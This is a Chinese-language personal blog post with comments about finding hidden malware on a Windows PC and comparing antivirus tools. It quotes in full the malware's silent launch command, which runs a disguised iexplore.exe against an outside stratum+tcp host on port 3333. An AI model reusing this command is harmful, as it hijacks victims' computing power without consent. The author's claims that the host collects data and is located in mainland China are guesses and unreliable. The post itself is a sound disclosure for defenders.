前陣子看到開機之後, 都會有一個 spoolv 佔了系統 80% 的運算量, 把它砍掉之後就好了. 雖然知道是病毒, 但還是不明就裡?
結果昨天不但在 windows 底下看到 panther 病毒的目錄, 還看到一個 mix 目錄, 裡面就有 spoolv. 再找一找, 也在 c: 的根目錄找到一個 iexplore.exe, 也在啟動裡面找到它的發動機 – sh 檔.
它的感染流程我還不知道 – 沒有像百度千千靜聽和 QVOD 會導致 hao123、sanpdo、QVO6 …那麼明顯, 但是啟動流程大致就是由 Windows 啟動時的 shell script 帶頭, 執行下面一段指令.
%SystemRoot%mixhstart.exe /NOCONSOLE /SILENT /D="%SystemRoot%mixspoolv32" /HIGH "%SystemRoot%mixspoolv32iexplorer.exe -o stratum+tcp://cat.or.gs:3333 -O geox.1:x"
簡單地說, 它要到 c:windowsmix 底下執行 hstart.exe, 然後跑一個很小的 iexplore.exe. 從工作管理員看來, 只會看到這個熟悉名字, 一時不會覺得奇怪.不過若是去點它的 "內容" –> "數位簽章", 就知道這不是 Microsoft 發行的.
我覺得它最厲害的地方就是 tcp 到 cat.or.gs 了.這個 ip (162.212.255.218) 看起來是大陸的, 也就是收集資料的主機. 但它怎麼能確定 port 3333 是開著的呢? 因為它主動把防火牆給關了.因此防火牆被關也是一個重要徵兆.
至於 Panther 應該和它們不是同一個家族, 不過它的名氣也比較大.比較容易被防毒軟體認出來. 我的 Norton 或是趨勢的防毒軟體都沒抓到那個假 iexplore.exe, 後者只有在它執行的時候, 才會問要不要封鎖而已.
[20140228 補充]
1. 基本上, 趨勢的 PCcillin 是比較抓不到病毒的. 相形之下, Panda Antivirus Pro 試用版可以在 PCcillin 之後又抓出 14 個病毒. 當我再換成 Norton Antivirus 之後, Norton 說要把 PCcillin 反安裝, 但是它卻不排斥貓雄.
金山毒霸廣提示視窗然多, 但是它在貓熊和 Norton 之後還找出更多的病毒, 只是有個 Microsoft.com 病毒消不掉. 當三個防毒軟體病毒同時存在時, 貓熊就被排斥了, 一開起來就閃退. Norton 和毒霸相安無事.
Cash Chou's Blog 
厲害.
左岸網軍真是無所不在啊…orz
我很久以前同時安裝PCcillin和Norton(都是正版), 電腦就暴走了, 所以就一直改用Avira Free, 也還堪用.
其實毒霸也可以 call 小紅傘來用, 對岸下毒和解毒功力都好強.